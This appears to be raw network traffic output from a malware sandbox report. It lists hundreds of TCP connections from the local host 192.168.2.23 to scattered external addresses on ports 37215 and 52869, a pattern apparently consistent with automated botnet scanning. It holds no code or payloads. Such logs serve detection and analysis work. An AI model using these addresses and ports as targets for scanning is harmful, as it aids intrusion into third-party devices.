    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.39.150.213:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.54.63.30:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.66.201.104:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.230.170.2:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.55.57.221:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.27.236.245:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.234.149.117:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.59.243.109:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.87.143.243:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.217.50.117:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.123.216.66:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.164.75.99:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.112.107.0:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.92.198.40:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.75.18.166:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.183.84.21:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.80.255.229:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.241.100.248:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.184.197.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.245.25.83:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.233.89.106:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.168.52.50:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.74.177.168:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.32.99.125:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.81.168.3:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.252.117.119:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.204.114.88:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.142.201.92:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.153.113.9:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.24.4.176:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.223.129.169:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.161.237.217:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.203.157.142:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.249.43.225:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.85.5.232:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.90.120.167:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.228.188.42:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.200.249.5:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.91.185.114:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.153.64.50:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.32.95.52:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.93.15.186:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.224.7.237:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.82.168.154:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.31.107.159:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.38.152.208:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.42.53.29:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.105.228.209:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.240.94.165:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.7.26.224:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.97.119.177:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.148.109.85:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.205.127.3:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.187.199.232:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.235.215.248:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.152.115.155:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.179.27.253:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.36.74.0:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.173.91.39:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.140.208.152:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.171.43.53:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.124.71.109:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.173.65.194:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.8.5.156:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.175.199.59:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.187.204.55:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.74.101.5:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.172.191.78:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.237.67.208:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.79.248.6:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.176.222.37:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.1.174.228:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.133.6.132:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.148.249.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.255.189.207:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.173.243.207:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.98.147.16:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.86.35.174:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.126.151.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.154.166.139:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.8.175.64:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.105.132.130:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.155.40.75:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.85.120.131:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.188.21.130:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.208.149.30:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.208.92.50:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.176.254.136:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.41.99.187:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.182.254.12:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.117.99.103:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.193.250.43:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.185.233.234:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.95.221.33:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.225.154.220:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.133.24.185:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.163.214.144:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.35.177.117:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.52.133.129:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.93.42.222:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.127.18.177:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.62.74.160:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.206.176.107:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.171.118.121:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.86.102.27:37215
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.140.235.75:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.72.238.75:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.215.81.18:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.217.106.75:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.138.149.14:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.149.248.129:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.180.85.130:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.215.36.125:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.120.132.36:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.59.53.53:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.181.247.141:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.249.176.74:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.109.105.114:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.46.244.2:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.253.123.91:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.33.192.36:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.166.55.160:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.207.59.27:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.9.173.9:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.130.57.110:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.247.10.119:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.57.10.220:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.67.178.34:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.225.28.50:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.107.194.89:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.102.129.137:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.43.98.140:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.188.252.244:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.128.10.94:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.144.102.228:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.145.126.155:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.142.252.146:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.94.13.23:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.207.180.161:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.33.30.34:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.53.193.157:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.21.172.188:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.38.124.230:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.5.247.66:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.122.13.123:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.231.31.99:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.143.109.18:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.201.68.174:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.81.149.42:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.22.84.23:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.0.35.217:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.62.52.107:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.126.252.211:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.156.8.176:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.203.155.214:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.189.84.153:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.20.216.222:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.87.231.108:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.139.182.65:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.85.37.101:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.238.117.60:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.96.35.60:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.4.62.230:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.101.218.41:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.68.164.109:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.160.79.1:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.24.1.227:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.214.4.96:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.145.110.224:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.105.184.211:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.137.143.70:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.23.128.64:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.30.52.93:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.10.44.21:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.9.87.179:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.212.254.17:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.42.170.55:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.43.41.104:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.64.11.32:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.113.99.200:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.129.78.246:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.119.138.71:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.202.177.110:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.186.220.244:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.164.77.3:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.0.220.251:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.207.196.164:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.32.42.8:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.185.214.51:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.27.83.54:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.204.20.65:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.0.202.134:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.13.159.214:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.5.110.155:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.59.30.11:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.216.48.240:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.91.68.219:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.155.166.172:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.2.16.38:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.80.218.173:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.181.171.194:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.247.30.207:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.117.59.75:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.230.98.236:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.33.38.148:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.181.102.165:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.32.215.50:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.94.69.166:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.252.133.139:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.192.141.120:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.208.238.173:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.41.234.9:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.148.244.203:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.248.76.232:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.26.84.32:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.69.32.247:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.102.198.254:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.200.186.68:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.18.255.200:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.3.172.250:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.8.6.201:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.147.109.23:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.4.91.226:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.65.0.51:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.118.215.57:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.229.109.40:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.147.166.12:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.254.119.245:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.221.253.126:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.158.24.53:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.77.249.17:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.125.229.49:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.107.89.159:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.125.142.188:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.3.20.88:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.189.110.98:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.105.3.237:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.154.63.226:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.172.166.123:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.107.152.91:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.193.160.102:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.54.125.230:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.97.133.51:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.29.67.239:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.203.192.163:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.147.234.140:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.96.105.209:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.4.205.221:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.204.11.233:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.157.176.143:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.223.121.53:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.211.7.177:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.193.93.44:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.57.197.226:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.214.42.21:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.192.185.51:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.39.184.82:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.253.96.115:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.216.125.177:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.202.38.39:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 41.77.68.155:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.146.50.70:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 156.96.61.239:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.160.182.90:52869
    Source: global trafficTCP traffic: 192.168.2.23:48244 -> 197.163.70.11:52869
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.7.22.45:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.72.241.59:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.215.199.44:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.122.145.226:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.43.39.252:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.68.210.189:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.224.205.247:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.102.67.143:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.160.233.75:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.1.30.26:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.246.98.208:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.199.90.78:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.141.52.111:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.79.177.207:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.173.150.164:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.190.240.66:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.89.165.83:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.74.248.4:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.59.62.84:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.174.68.192:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.236.159.36:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.171.239.113:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.223.154.4:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.131.140.160:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.99.236.75:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.78.20.251:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.211.172.103:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.163.237.229:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.29.183.94:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.185.174.218:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.171.178.228:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.203.79.177:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.144.69.209:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.20.140.196:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.38.204.247:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.207.236.14:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.156.213.190:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.252.25.116:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.145.188.176:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.167.156.17:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.101.193.190:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.148.220.113:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.203.79.109:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.208.155.233:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.215.211.168:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.210.197.236:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.165.53.174:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.236.25.62:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.33.209.237:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.5.71.92:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.142.158.50:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.174.243.185:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.60.13.124:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.33.209.230:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.148.17.148:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.69.187.74:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.230.41.115:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.107.43.182:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.90.69.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.211.128.186:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.100.245.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.147.86.15:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.87.227.20:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.250.10.24:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.100.219.74:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.179.142.163:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.34.79.123:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.196.237.32:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.55.66.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.181.116.65:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.89.174.36:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.163.100.177:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.90.209.41:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.55.224.44:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.71.164.148:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.152.248.118:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.229.61.255:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.218.69.15:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.12.88.62:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.166.21.61:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.36.59.112:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.53.210.115:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.113.11.199:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.44.50.63:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.206.68.107:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.219.141.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.108.207.246:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.98.164.103:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.219.247.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.100.193.92:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.103.197.53:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.42.232.38:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.161.89.202:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.100.0.31:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.73.77.116:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.42.56.45:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.166.234.90:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.43.49.127:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.108.208.255:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.227.131.34:37215
